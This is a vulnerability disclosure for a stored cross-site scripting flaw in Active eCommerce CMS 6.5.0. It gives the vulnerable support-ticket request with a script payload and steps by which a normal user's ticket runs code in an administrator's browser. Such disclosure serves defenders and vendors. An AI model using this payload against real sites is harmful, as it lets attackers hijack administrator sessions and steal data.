┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : https://activeitzone.com/active-ecommerce-cms/                             │
│  Vendor   : Active It Zone                                                             │
│  Software : Active eCommerce CMS 6.5.0                                                 │
│  Vuln Type: Stored XSS                                                                 │
│  Impact   : Manipulate the content of the site                                         │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│  Allow Attacker to inject malicious code into website, give ability to steal sensitive │
│  information, manipulate data, and launch additional attacks.                          │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

   Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  
       
	CryptoJob (Twitter) twitter.com/0x0CryptoJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


## Stored XSS

------------------------------------------------------------
POST /ecommerce/support_ticket HTTP/2

Content-Disposition: form-data; name="details"

<script>alert(1)</script>
------------------------------------------------------------

POST parameter 'details' is vulnerable to XSS


## Steps to Reproduce:

1. Login (as User) "Normal User"
2. Go to [Support Ticket] on this Path (https://website/support_ticket)
3. Click [Create a Ticket]
4. Inject your [XSS Payload] in "Provide a detailed description"
5. Send Ticket

6. When ADMIN Visit [Support Desk] .. [Ticket] to Check [New Tickets] in Administration Panel on this Path (https://website/admin/support_ticket)
7. The  ADMIN will click on the [Eye Icon] to View Details and Read The Ticket
8. XSS will Fire & Executed on his Browser


[-] Done